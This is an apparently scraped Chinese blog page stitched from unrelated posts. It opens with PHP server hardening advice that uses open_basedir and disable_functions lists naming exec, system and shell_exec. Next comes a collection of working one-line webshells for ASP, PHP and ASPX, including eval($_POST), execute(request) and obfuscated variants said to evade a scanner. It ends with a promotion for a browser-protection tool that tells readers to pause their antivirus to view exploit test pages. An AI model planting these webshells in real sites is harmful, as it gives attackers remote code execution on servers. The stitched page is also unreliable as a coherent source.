首先修改httpd.conf，如果你只允许你的php脚本程序在web目录里操作，还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs，那么在httpd.conf里加上这么几行：

　　php_admin_value open_basedir /usr/local/apache/htdocs

　　这样，如果脚本要读取/usr/local/apache/htdocs以外的文件将不会被允许，如果错误显示打开的话会提示这样的错误：

　　Warning: open_basedir restriction in effect. File is in wrong directory in /usr/local/apache/htdocs/open.php on line 4 等等。

如果有多个基于域名的虚拟主机

<VirtualHost *>
ServerName     www.test1.com
DocumentRoot /usr/local/apache/htdocs/test1
<Directory /usr/local/apache/htdocs/test1>
     php_admin_value open_basedir     /usr/local/apache/htdocs/test1
</Directory>
</VirtualHost>

注意:在php_admin_value open_basedir别忘了加上php.ini中指定的PHP临时上传目录和session保存目录，不然会无法上传文件、存取session
php.ini中按如下配置：
upload_tmp_dir = "/tmp"
session.save_path = "/var/phpsession"

　　2、防止php木马执行webshell （严重采用）

　　打开safe_mode，

　　在，php.ini中设置

　　disable_functions= passthru，exec，shell_exec，system

　　二者选一即可，也可都选

　　3、防止php木马读写文件目录 （好像没有要求这么严格,不推荐采用。）

　　在php.ini中的

　　disable_functions= passthru，exec，shell_exec，system

　　后面加上php处理文件的函数

　　主要有

　　fopen，mkdir，rmdir，chmod，unlink，dir

　　fopen，fread，fclose，fwrite，file_exists

　　closedir，is_dir，readdir.opendir

　　fileperms.copy，unlink，delfile

　　即成为

　　disable_functions= passthru，exec，shell_exec，system，fopen，mkdir，rmdir，chmod，unlink，dir

　　，fopen，fread，fclose，fwrite，file_exists

　　，closedir，is_dir，readdir.opendir

　　，fileperms.copy，unlink，delfile

　　ok，大功告成，php木马拿我们没辙了.

您可能也对这些文章感兴趣

• 选择学习“下一个”程序语言
• 利用PHP下载CSS文件中的图片
• linux下php加载mbstring的方法
• 利用 QQWry.Dat 实现 IP 地址高效检索（PHP）
• 刚参加完Discuz！研发人员与PHPer技术交流会

<%execute(request("1"))%>

php一句话

<?php eval($_POST[1]);?>

@preg_replace("/[email]/e",$_POST['h'],"error");

aspx一句话

<script language="C#" runat="server">
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");
</script>

可以躲过雷客图的一句话。

<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>

不用'<,>'的asp一句话

<script language=VBScript runat=server>execute request("1")</script>

不用双引号的一句话。

<%eval request(chr(35))%>

您可能也对这些文章感兴趣

• 防范php木马
• IE卫士1.2 用于防网页木马

IE卫士

IEKavassInstall.rar
软件介绍

软件功能和特点：1。软件嵌入浏览器（Internet Explorer、Maxthon），从木马运行的必要途径上拦截木马的运行，不夸张的说，它可以抵御现今为至各种原理的网页木马的来袭，不论是已知木马还是未知木马；2。软件几乎不占用CPU资源，因为它没有进程，和浏览器融为一体，只在浏览器启动时做好一切防御工作，然后就一直等待，只有当木马病毒来袭时程序才会被重新唤醒；3。软件安装后你会惊奇的发现系统和安装前没有任何不同，你看不到任何的进程，也没有任何的浏览器插件按钮，唯一的不同只是当你浏览木马网页时浏览器会给出警告信息。

软件安装说明：1。我可以保证的说，程序绝无任何恶意组件；2。我也可以保证的说，程序能完全卸载干净（卸载时请关闭所有IE窗口），卸载的方法是再次运行安装程序，它会自动检测是新安装还是卸载；3。软件在安装时有些主动防御的杀毒软件可能会有警告信息，您不必有任何担心，这是因为软件采用了BHO技术和浏览器融合（迅雷也采用了这一技术），而有些木马也会采用这一技术实现自启动，因此杀毒软件会认为这是一项危险操作，您可以完全相信本程序无恶意成份；4。为了强调本软件绝无恶意成份，我以langouster这个网名的名誉保证这点，大家可以在baidu上搜一下就知道这个网名至少不是一文不值的。

软件技术说明：软件核心采用HOOK技术，挂钩了多个木马病毒执行必需的API，有些API都是MicroSoft公司未公开的。软件采用了MD5求HASH值的方法保证了程序的完整性。

拦截效果测试：为说明问题及检测IE卫士的效果，我这里给出一种测试方法：以下几个测试页面是黑客常用的网页木马程序，这里已经把它们修改为无害程序，你可以在装IE卫士前先打开这几个页面，如果看到一个提示您有漏洞的对话框那么说明你的电脑极易受攻击，强烈建议安装IE卫士；然后在安装IE卫士后（别忘了重启浏览器）再次打开下面的网页，如果你看到拦截对话框那么IE卫士已成功安装并发挥功效（当然是在前一次测试报告你的电脑存在漏洞的情况下才能看到，不然的话本身木马也不会运行，谈何IE卫士拦截），否则如果您在安装有IE卫士之后还看到了漏洞提示对话框那么请告诉我。

测试页面：MS06014漏洞测试 ANI漏洞测试 注意：由于测试页面为黑客常用的页面，所以两个测试页面可能会被杀毒软件拦截，你可以先暂停杀毒软件。


软件完整演示录像：演示录像

支持系统：最新版本支持所有安装有Internet Explorer或Mathon（遨游）2.0版本以下的Windows 2000、Windows XP及Windows 2003系统；1.0版本不支持Windows 2000系统。

注意：Windows 2003系统中默认设置下Internet Explorer不加载BHO，你需要手动设置支持，如图：

您可能也对这些文章感兴趣

• 防范php木马
• 一句话木马的多种写法